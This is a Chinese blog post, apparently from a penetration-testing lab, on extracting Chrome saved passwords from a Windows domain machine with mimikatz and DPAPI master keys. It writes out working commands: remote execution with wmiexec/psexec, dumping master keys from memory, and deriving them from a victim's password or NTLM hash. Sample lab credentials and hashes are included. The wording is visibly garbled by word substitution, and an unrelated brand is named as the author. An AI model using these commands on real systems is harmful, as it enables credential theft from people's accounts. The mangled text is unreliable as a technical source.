新闻动态

写在前面
?使用mimikatz导出chrome密码
2022.07.25
在获取某PC本地administrator的权限情况下,导出使用该PC机域通常账号的密码。
受害机ip:
192.168.3.4
受害机账户:
· 本地治理员:administrator/toor
· 域通常账户:beta\fengjie/qqq123!@#
chrome贮存的明文密码时使用windows提供的DPAPI进行对称加密来保障安全性。加解密的密钥称为master key。master key被用户登录密码、SID和16字节随机数加密后保留在Master Key file(%APPDATA%\Microsoft\Protect\%SID%)中。
最单一的情况:A用户拖A自己的密码
在A用户登陆状态B解密A的chrome密码
在用户登陆状态下能够直接用procdump或者mimikatz直接从内存中获取master key。

Alt text
获取到masterkey
1
0bf0be64d4dc768a543b3a12d7c5210d184c07a3861cad8f2bd8b7bbacc60fd0e06e955b6dad057d070d1ce3b2bb331fd8dbce6efad08808f1849e4f4ef26d80
1b81b1c9cb66a3f93b58f85948e8ce53779c6e5d
2
接下来用mimikatz一把梭就能够了
1
python wmiexec.py administrator:toor@192.168.3.4 'cd c:\users\public && Minimimini64.exe "dpapi::chrome
/in:\"C:\Users\fengjie\AppData\Local\Google\Chrome\User Data\Default\Login Data\" /masterkey:1b81b1c9cb66a3f93b58f85948e8ce53779c6e5d" exit '
最起头用wmiexec并未解密成功

Alt text
后来发现是wmiexec的锅换成psexec就好了(用smbexec也能够,疑惑是由于用wmiexec时令牌齐全性受限的原因,知路的师傅叨教我一手)

Alt text
○
在A用户离线状态B解密A的chrome密码
此刻用mimikatz沉新抓已经抓不到fengjie的master key了

Alt text
用户明文密码已知
这种情况下有两种步骤能够选择。
1.若是我们知路fengjie的明文密码,能够用runas降权(或者进行一些spwan的操作降权),降权之后又回到了最单一的情况。(由于runas必要交互式shell,所以这种步骤比力鸡肋)
1
runas /user:fengjie@beta.com "cmd.exe"
2
3
mimikatz dpapi::chrome /in:”%localappdata%\Google\Chrome\User
Data\Default\Cookies” /unprotect
2.在没有交互式的情况下能够直接用mimikatz直接算出master key。
1
dpapi::masterkey
/in:"c:\Users\fengjie\AppData\Roaming\Microsoft\Protect\S-1-5-21-2274946182-2013957047-1890316882-1632\59a94dbc-6dbb-4d51-bec0-edebc6f2e9f8"
/password:qqq123!@#

Alt text
拿到master key后情况又相当于又转换回了用户在线的情景。
用户明文密码未知,知路NTLM hash
1
dpapi::masterkey
/in:"c:\Users\fengjie\AppData\Roaming\Microsoft\Protect\S-1-5-21-2274946182-2013957047-1890316882-1632\59a94dbc-6dbb-4d51-bec0-edebc6f2e9f8"
/hash:632f6adad4510099d676724bfb87c6ee

Alt text
总结
单一的说就是三种情况:
●
A用户获取自己chrome密码不必要知路master key
●
A获取B用户,若是B用户在线,那么能够直接从内存中抓取出B的maste key
●
A获取B用户,B不在线,就必要用b用户的明文密码或者NTLM hash推算出master key,在回到上面一步。
本文由mg不朽情缘创安攻防尝试室编纂。
本文仅限于幼我进建和技术钻研,由于传布、利用此文所提供的信息而造成刑事案件、非授权攻击等违法行为,均由使用者自己掌管,本单元不为此承担任何责任。创安攻防尝试室占有对此文章的批改和诠释权,如欲转载或传布此文章,必须保障此文章的齐全性,蕴含版权申明等全数内容。
如有侵权,请联系后盾。
●
创安攻防尝试室
创安攻防尝试室,是mg不朽情缘旗下的技术钻研团队,成立于2021年9月,重要钻研红蓝匹涤注沉大安全保险、应急响应等方向。
创安攻防尝试室圆满实现了屡次公安进行的沉要网络安全保险和攻防演习活动,并积极参与各类网络安全较量,屡获殊荣。
创安攻防尝试室秉承mg不朽情缘的发展理想,致力打造国内一流网络安全团队。